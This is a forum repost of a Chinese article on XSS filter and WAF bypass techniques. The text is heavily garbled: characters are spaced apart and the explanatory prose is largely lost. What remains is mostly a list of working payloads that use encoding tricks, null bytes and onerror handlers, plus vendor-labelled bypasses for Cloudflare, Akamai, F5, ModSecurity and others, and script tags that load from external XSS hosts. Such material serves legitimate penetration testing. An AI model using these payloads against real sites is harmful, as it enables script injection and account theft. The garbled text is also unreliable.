搜索

[18865] 2019-05-30_聊聊XSS漏洞(二)

文档创建者:s7ckTeam
浏览次数:14
最后更新:2025-01-18
2019-05-30_聊聊XSS漏洞(二) X S S c r h u a   h u a s e c   2 0 1 9 - 0 5 - 3 0   b y p a s s 0 1 u r l %   u r l   % 2 5   u r l   d e c o d e       u r l   d e c o d e   W A F 0 2 b a s e 6 4 W A F   < >     s c r i p t     o n X X X X     ,     b a s e 6 4   0 3 H T M L p a y l o a d : t i p : 1 j s   < i f r a m e   s r c = " d a t a : t e x t / h t m l ; b a s e 6 4 , P H N j c m l w d D 5 h b G V y d C g n Y m F z Z T Y 0 X 2 l m c m F t Z S c p P C 9 z Y 3 J p c H Q + " > < a   h r e f = ' j a v a s c r i p t : a l e r t & # 4 0 ; & # 3 9 ; 1 2 3 & # 3 9 ; & # 4 1 ; ' > h e l l o < / a > < a   h r e f = " j & # 9 7 ; v a s c r i p t : a l e r t & # 0 0 0 0 0 4 0 ; ' 1 2 3 ' & # 4 1 ; " > h e l l o < / a >
e v a l e v a l     x         u   u n i c o d e ) 2 h t m l     u r l   0 4 h t t p   p a y l o a d 0 5   / s c r i p t   0 6 j a v a s c r i p t   < a   h r e f = " j & # 9 7 ; v a s c r i p t : e v a l ( ' & # ; u 0 0 9 1 x 6 5 x 7 2 x 7 4 x 2 8 x 2 2 x 3 1 x 2 2 x 2 9 ' ) " > h e l l o < / a > < s v g   o n l o a d = % 2 6 % 2 3 9 7 % 3 B % 2 6 % 2 3 1 0 8 % 3 B % 2 6 % 2 3 1 0 1 % 3 B % 2 6 % 2 3 1 1 4 % 3 B % 2 6 % 2 3 1 1 6 % 3 B ( d o c u m e n t . d o m a i n ) > < s c r i p t / s r c = t t p s : / / 1 4 . r s   > < / s c r i p t > < s c r i p t / s r c = t t p : / / 1 4 . r s   > < / s c r i p t > < s c r i p t / s r c = / / 1 4 . r s > < / s c r i p t > < % 2 f s c r i p t > < % 2 5 2 f s c r i p t > < % 2 5 2 f S c R i p t > < % 2 5 2 f S c r I P t % 2 0 > < % 2 5 2 f s C r I p t + i p T % 2 0 > i f   ( ! S t r i n g . f r o m C o d e P o i n t )   {     ( f u n c t i o n ( )   {         v a r   d e f i n e P r o p e r t y   =   ( f u n c t i o n ( )   {             / /   I E   8   o n l y   s u p p o r t s   ` O b j e c t . d e f i n e P r o p e r t y `   o n   D O M   e l e m e n t s             t r y   {                 v a r   o b j e c t   =   { } ;                 v a r   $ d e f i n e P r o p e r t y   =   O b j e c t . d e f i n e P r o p e r t y ;                 v a r   r e s u l t   =   $ d e f i n e P r o p e r t y ( o b j e c t ,   o b j e c t ,   o b j e c t )   & &   $ d e f i n e P r o p e r t y ;
                v a r   r e s u l t   =   $ d e f i n e P r o p e r t y ( o b j e c t ,   o b j e c t ,   o b j e c t )   & &   $ d e f i n e P r o p e r t y ;               }   c a t c h ( e r r o r )   { }             r e t u r n   r e s u l t ;         } ( ) ) ;         v a r   s t r i n g F r o m C h a r C o d e   =   S t r i n g . f r o m C h a r C o d e ;         v a r   f l o o r   =   M a t h . f l o o r ;         v a r   f r o m C o d e P o i n t   =   f u n c t i o n ( )   {             v a r   M A X _ S I Z E   =   0 x 4 0 0 0 ;             v a r   c o d e U n i t s   =   [ ] ;             v a r   h i g h S u r r o g a t e ;             v a r   l o w S u r r o g a t e ;             v a r   i n d e x   =   - 1 ;             v a r   l e n g t h   =   a r g u m e n t s . l e n g t h ;             i f   ( ! l e n g t h )   {                 r e t u r n   ' ' ;             }             v a r   r e s u l t   =   ' ' ;             w h i l e   ( + + i n d e x   <   l e n g t h )   {                 v a r   c o d e P o i n t   =   N u m b e r ( a r g u m e n t s [ i n d e x ] ) ;                 i f   (                     ! i s F i n i t e ( c o d e P o i n t )   | |   / /   ` N a N ` ,   ` + I n f i n i t y ` ,   o r   ` - I n f i n i t y `                     c o d e P o i n t   <   0   | |   / /   n o t   a   v a l i d   U n i c o d e   c o d e   p o i n t                     c o d e P o i n t   >   0 x 1 0 F F F F   | |   / /   n o t   a   v a l i d   U n i c o d e   c o d e   p o i n t                     f l o o r ( c o d e P o i n t )   ! =   c o d e P o i n t   / /   n o t   a n   i n t e g e r                 )   {                     t h r o w   R a n g e E r r o r ( ' I n v a l i d   c o d e   p o i n t :   '   +   c o d e P o i n t ) ;                 }                 i f   ( c o d e P o i n t   < =   0 x F F F F )   {   / /   B M P   c o d e   p o i n t                     c o d e U n i t s . p u s h ( c o d e P o i n t ) ;                 }   e l s e   {   / /   A s t r a l   c o d e   p o i n t ;   s p l i t   i n   s u r r o g a t e   h a l v e s                     / /   h t t p : / / m a t h i a s b y n e n s . b e / n o t e s / j a v a s c r i p t - e n c o d i n g # s u r r o g a t e - f o r m u l a e                       c o d e P o i n t   - =   0 x 1 0 0 0 0 ;                     h i g h S u r r o g a t e   =   ( c o d e P o i n t   > >   1 0 )   +   0 x D 8 0 0 ;                     l o w S u r r o g a t e   =   ( c o d e P o i n t   %   0 x 4 0 0 )   +   0 x D C 0 0 ;                     c o d e U n i t s . p u s h ( h i g h S u r r o g a t e ,   l o w S u r r o g a t e ) ;                 }                 i f   ( i n d e x   +   1   = =   l e n g t h   | |   c o d e U n i t s . l e n g t h   >   M A X _ S I Z E )   {                     r e s u l t   + =   s t r i n g F r o m C h a r C o d e . a p p l y ( n u l l ,   c o d e U n i t s ) ;                     c o d e U n i t s . l e n g t h   =   0 ;                 }             }             r e t u r n   r e s u l t ;         } ;         i f   ( d e f i n e P r o p e r t y )   {             d e f i n e P r o p e r t y ( S t r i n g ,   ' f r o m C o d e P o i n t ' ,   {                 ' v a l u e ' :   f r o m C o d e P o i n t ,                 ' c o n f i g u r a b l e ' :   t r u e ,                 ' w r i t a b l e ' :   t r u e             } ) ;         }   e l s e   {             S t r i n g . f r o m C o d e P o i n t   =   f r o m C o d e P o i n t ;         }
" ? " " ? " I S " ? " . t o U p p e r C a s e ( )   = =   ' I ' " ? " . t o U p p e r C a s e ( )   = =   ' S ' 0 7     } ( ) ) ; } f o r   ( v a r   j   =   ' A ' . c h a r C o d e A t ( ) ;   j   < =   ' Z ' . c h a r C o d e A t ( ) ;   j + + ) {     v a r   s   =   S t r i n g . f r o m C o d e P o i n t ( j ) ;     f o r   ( v a r   i   =   0 ;   i   <   0 x 1 0 F F F F ;   i + + )   {         v a r   e   =   S t r i n g . f r o m C o d e P o i n t ( i ) ;         i f   ( s   = =   e . t o U p p e r C a s e ( )   & &   s   ! =   e )   {             d o c u m e n t . w r i t e ( " c h a r :   " + e + " < b r / > " ) ;     } ; } ; } c h a r :   a c h a r :   b c h a r :   c c h a r :   d c h a r :   e c h a r :   f c h a r :   g c h a r :   h c h a r :   i c h a r :   ? c h a r :   j c h a r :   k c h a r :   l c h a r :   m c h a r :   n c h a r :   o c h a r :   p c h a r :   q c h a r :   r c h a r :   s c h a r :   ? c h a r :   t c h a r :   u c h a r :   v c h a r :   w c h a r :   x c h a r :   y c h a r :   z
使 t h r o w 0 8 0 0 9 a s c i i a s c i i w 1 0 1 1 < a   o n m o u s e o v e r = " j a v a s c r i p t : w i n d o w . o n e r r o r = a l e r t ; t h r o w   1 > < i m g   s r c = x   o n e r r o r = " j a v a s c r i p t : w i n d o w . o n e r r o r = a l e r t ; t h r o w   1 " > < s c r i % 0 0 p t > a l e r t ( 1 ) ; < / s c r i % 0 0 p t > < s c r i x 0 0 p t > a l e r t ( 1 ) ; < / s c r i % 0 0 p t > < s % 0 0 c % 0 0 r % 0 0 % 0 0 i p % 0 0 t > c o n f i r m ( 0 ) ; < / s % 0 0 c % 0 0 r % 0 0 % 0 0 i p % 0 0 t > < i m g /   / μ   s r c = x   o n e r r o r = a l e r t ( 1 ) / / > < i m g   s r c = x 1 7 x 1 7   o n e r r o r = a l e r t ( 1 ) / / > < i m g / % 2 0 s r c = % 1 7 y % 1 7   o n e r r o r = % C 2 % A 0 a l e r t ( 1 ) / / > < s c r i p t > v a r   a = h ' ; v a r   b = : / / ; d o c u m e n t . w r i t e ( < s c r i p t   s r c = + a + t t p + b + x s s . t w / x x x > < / s c r i p t > ) ; < / s c r i p t >
使 使 1 2 w a f   b y p a s s 1 3 o n e r r o r < s c r i p t > { o n e r r o r = a l e r t } t h r o w   1 3 3 7 < / s c r i p t > W A F C l o u d f l a r e P a y l o a d < a / o n c l i c k = ( c o n f i r m ) ( ) > c l i c k W A F W o r d f e n c e P a y l o a d < a / h r e f = j a v a s c r i p t & c o l o n ; a l e r t ( ) > c l i c k W A F B a r r a c u d a P a y l o a d < a / h r e f = & # 7 4 ; a v a % 0 a % 0 d % 0 9 s c r i p t & c o l o n ; a l e r t ( ) > c l i c k W A F A k a m a i P a y l o a d < d 3 v / o n a u x c l i c k = [ 2 ] . s o m e ( c o n f i r m ) > c l i c k W A F C o m o d o P a y l o a d < d 3 v / o n a u x c l i c k = ( ( ( c o n f i r m ) ) ) > c l i c k W A F F 5 P a y l o a d < d 3 v / o n m o u s e l e a v e = [ 2 ] . s o m e ( c o n f i r m ) > c l i c k W A F M o d S e c u r i t y P a y l o a d < d e t a i l s / o p e n / o n t o g g l e = a l e r t ( ) > W A F d o t d e f e n d e r P a y l o a d < d e t a i l s / o p e n / o n t o g g l e = ( c o n f i r m ) ( ) / /

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理